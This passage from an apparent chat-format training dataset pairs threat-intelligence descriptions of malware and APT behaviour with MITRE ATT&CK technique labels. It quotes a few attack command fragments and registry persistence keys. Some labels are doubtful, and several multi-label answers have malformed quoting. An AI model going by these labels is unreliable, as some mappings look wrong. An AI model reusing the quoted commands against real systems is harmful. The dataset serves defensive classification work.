"identifies files and directories for collection by searching for specific file extensions or file modification time." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The optional HTTP data with king.jpg looks like a beacon to inform the control server that the malware is ready to accept new commands: Commands received from the control server are encoded DWORDs After decoding, these DWORDs should be in the range 123459h to 123490h Malware checking to make sure a received command is in the correct range" }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLUELIGHT has a XOR-encoded payload." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors collected email from Office 365 using a compromised valid service account with elevated privileges." }, { "role": "assistant", "content": "T1114.002 - Email Collection: Remote Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KOCTOPUS has used `cmd.exe` and batch files for execution." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The SysInfo plugin runs a selection of basic reconnaissance commands on the victim's machine via a cmd.exe process" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "netbook or inexpensive laptop - Raspberry Pi computer - Bash Bunny, a special tool for carrying out USB attacks" }, { "role": "assistant", "content": "T1200 - Hardware Additions" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RDAT can take a screenshot on the infected system." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kinsing has used SSH for lateral movement." }, { "role": "assistant", "content": "T1021.004 - Remote Services: SSH" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ecipekac has the ability to decrypt fileless loader modules." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mimikatz’s \"LSADUMP::DCSync\" and \"KERBEROS::PTT\" modules implement the three steps required to extract the krbtgt account hash and create/use Kerberos tickets." }, { "role": "assistant", "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MegaCortex has added entries to the Registry for ransom contact information." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the analyzed sample the RAT component was named “BotDLL[.]dll”. It has some typical RAT functionality such as command shell, video recording of the screen, remote desktop, port forwarding, and file system access" }, { "role": "assistant", "content": "T1125 - Video Capture', 'T1090 - Proxy', 'T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson can capture webcam video on targeted systems." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The webshell will save the archives locally to the server in the C:\\Users\\Public\\Libraries\\Recorded\\Files folder, each with a filename with the following structure: [IP address]_c$_Users_[username]__[Desktop-Documents-Downloads]_[year]-[month]-[day]-[hours]-[minutes]-[seconds].7z It is likely that the threat actors use this functionality to rapidly check for new files created by users on the network" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has created accounts on multiple compromised hosts to perform actions within the network." }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 leveraged sticky keys to establish persistence." }, { "role": "assistant", "content": "T1546.008 - Event Triggered Execution: Accessibility Features" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rancor launched a scheduled task to gain persistence using the \"schtasks /create /sc\" command." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Heyoka Backdoor can enumerate drives on a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDBbot has the ability to clean up and remove data structures from a compromised host." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ADVSTORESHELL can list files and directories." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has sometimes used drive-by attacks against vulnerable browser plugins." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Finally, it deletes Shadow Volume Copies and prevent the victim from using Shadow Volumes to recover their encrypted files" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation', 'T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has added persistence via the Registry key HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Destructive dstr command in BE2 config file Also, on some machines, documents were encrypted, but no related plugin could be found" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The group has the capability to set up phishing infrastructure to mimic well known websites and trick victims to enter their credentials. This is one of the main methods used by this actor to collect email addresses that later will be used to send spearphishing emails" }, { "role": "assistant", "content": "T1586.002 - Email Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWizard has the ability to scan ports on a compromised network." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nebulae uses functions named \"StartUserModeBrowserInjection\" and \"StopUserModeBrowserInjection\" indicating that it's trying to imitate chrome_frame_helper.dll." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SHOTPUT has a command to obtain a directory listing." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuTo Stealer can place malicious executables in a victim's AutoRun registry key or StartUp directory, depending on the AV product installed, to maintain persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A module has a default C2 port of 13000." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obtains additional code to execute on the victim's machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can execute commands remotely by creating a new service on the remote system." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo includes payloads written in JavaScript." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The lnk files were an especially interesting development because the powershell code they contain for decoding and dropping the payload is nearly identical to that utilized by the Zebrocy threat actor a month earlier" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34" }, { "role": "assistant", "content": "T1003.005 - OS Credential Dumping: Cached Domain Credentials', 'T1003.004 - OS Credential Dumping: LSA Secrets', 'T1555 - Credentials from Password Stores', 'T1552.001 - Unsecured Credentials: Credentials In Files', 'T1003.001 - OS Credential Dumping: LSASS Memory', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell can check the services on the system." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gather domain and account names based on all running processes Gathering account information from running processes" }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If that fails, the payload will use DNS tunneling by first issuing a DNS query to resolve the following domain to notify the C2 that the payload will send data to it in subsequent DNS queries:   ns1..   The payload will then split the message up into 60-byte chunks (only 1 in this case), which it will send to the C2 via DNS queries to resolve domains structured as:   ..   The payload will notify the C2 that it is done sending data by issuing a DNS query to resolve a domain structured as:   ns2..   Package Comparison of the QUADAGENT Samples The bat2exe version (SHA256: 5f001f3387ddfc0314446d0c950da2cec4c786e2374d42beb3acce6883bb4e63)has a batch script, PowerShell script, and associated file names embedded within several resources that it will decrypt using RC4 and various MD5 hashes for keys" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol', 'T1573 - Encrypted Channel', 'T1048 - Exfiltration Over Alternative Protocol', 'T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used port 80 for C2." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Bazar loader has named malicious shortcuts \"adobe\" and mimicked communications software." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker can delete shadow volumes." }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors used software packing in its tools." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoxCaon has created a working folder for collected files that it sends to the C2 server." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The screenshot in Figure 8 of the inf method within a Cannon sample (SHA256: 4405cfbf28…) shows the information gathered that is exfiltrated to the C2 via email, specifically with RunningPlace and LogicalDrives header strings: Figure 8 inf method used by Cannon When comparing the two Cannon variants, we found a method within a Delphi Cannon sample (SHA256: 5a02d4e5f6…) showing the use of Running place and Logical_Drivers as header strings to the system information it is collecting and sending to the C2 via email" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Spark has checked the results of the \"GetKeyboardLayoutList\" and the language name returned by \"GetLocaleInfoA\" to make sure they contain the word “Arabic” before executing." }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Keydnap uses Python for scripting to execute additional commands." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aoqin Dragon has spread malware in target networks by copying modules to folders masquerading as removable devices." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has acquired open-source tools for some of it's operations; for example it acquired Invoke-PSImage to establish an encrypted channel from a compromised host to Sandworm Team's C2 server as part of its preparation for the 2018 Winter Olympics attack." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak obtains Windows logon password details." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "With domain administrator privileges obtained, the threat actors then moved laterally throughout the network using SMB and RDP to deploy Cobalt Strike beacons on the domain controllers around 1 hour after the initial execution of Bazar. On the domain controllers, some additional discovery was done using the PowerShell Active Directory module. After establishing Cobalt Strike beacons on those they felt ready to proceed to their final objectives" }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "USBStealer registers itself under a Registry Run key with the name \"USB Disk Security.\"" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WIRTE has named a first stage dropper `Kaspersky Update Agent` in order to appear legitimate." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ServHelper has the ability to execute a PowerShell script to get information from the infected host." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkComet can load any files onto the infected machine to execute." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sakula uses single-byte XOR obfuscation to obfuscate many of its files." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some ZeroT DLL files have been packed with UPX." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has used encoded data in HTTP URLs for C2." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team used a backdoor which could execute a supplied DLL using rundll32.exe." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "specifically looks for Domain Admins, Power Users, and the Administrators groups within the domain and locally" }, { "role": "assistant", "content": "T1069 - Permission Groups Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used the Invoke-Inveigh PowerShell cmdlets, likely for name service poisoning." }, { "role": "assistant", "content": "T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These dropped files bundle functionality for both 64bit and 32bit Windows systems and are all located within one directory: C:\\Documents and Settings\\user\\Application Data\\ATI_Subsystem\\ 6761106f816313394a653db5172dc487,amdhcp32.dll,54kb  ← 32bit dll,CompiledOn:2014.07.02 21:13:24 d596827d48a3ff836545b3a999f2c3e3,aticaldd.dll,60kb  ← 64bit dll,CompiledOn:2014.07.02 21:13:26 bc626c8f11ed753f33ad1c0fe848d898,atiumdag.dll,285kb ← 32bit dll, Trojan.Win32.CozyDuke.a, CompiledOn:2014.07.02 21:13:26 4152e79e3dbde55dcf3fc2014700a022,6kb,racss.dat The code copies rundll32.exe from windows\\system32 to its newly created %appdata%\\ATI_Subsystem subdirectory as “amdocl_as32.exe” alongside the three dll’s listed above" }, { "role": "assistant", "content": "T1055 - Process Injection', 'T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking', 'T1218.011 - Signed Binary Proxy Execution: Rundll32', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 performed network scanning on the network to search for open ports, services, OS finger-printing, and other vulnerabilities." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once Shamoon has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy\" to 1." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In addition, multiple APT40 command and control (C2) domains were initially registered by China based domain resellers and had Whois records with Chinese location information, suggesting a China based infrastructure procurement process" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lastly, the new variant of RogueRobin is capable of using the Google Drive cloud service for its C2 channel, suggesting that DarkHydrus may be shifting to abusing legitimate cloud services for their infrastructure" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The trojan supports file deletion." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the .NET PE file has been run, we observed the same behavior as the above QUADAGENT sample of dropping a PowerShell script with the filename SystemDiskClean.ps1 alongside a VBScript file with the same name" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "copies staged data to removable drives when they are inserted into the system." }, { "role": "assistant", "content": "T1052 - Exfiltration Over Physical Medium" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HotCroissant has the ability to retrieve a list of files in a given directory as well as drives and drive types." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrifeWater can send data and files from a compromised host to its C2 server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Milan can enumerate the targeted machine's name and GUID." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HyperBro has the ability to take screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The following commands are available: Command SubCommand Description VER Generates the following IRC client command that will be sent to the C2 server:   PRIVMSG :    8 LED= 20160124 KILL Trojan disconnects from the IRC server and terminates itself RESET Trojan disconnects from the IRC server and runs the executable again OS Obtains the Windows version and responds to the C2 with the following message “PRIVMSG :”:   Windows NT Windows 95 Windows 98 Windows ME Windows 2003 Windows XP Windows 7 Windows Vista Unkown os info !SH EXEC Not supported MD Creates a specified directory" }, { "role": "assistant", "content": "T1106 - Native API', 'T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot has the ability to use HTTP and HTTPS in communication with C2 servers." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Whitefly has used an open-source tool to exploit a known Windows privilege escalation vulnerability (CVE-2016-0051) on unpatched computers." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses port 80 for C2." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers information about opened windows." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gold Dragon collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RobbinHood disconnects all network shares from the computer with the command \"net use * /DELETE /Y\"." }, { "role": "assistant", "content": "T1070.005 - Indicator Removal on Host: Network Share Connection Removal" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT used Nmap for remote system discovery." }, { "role": "assistant", "content": "T1018 - Remote System 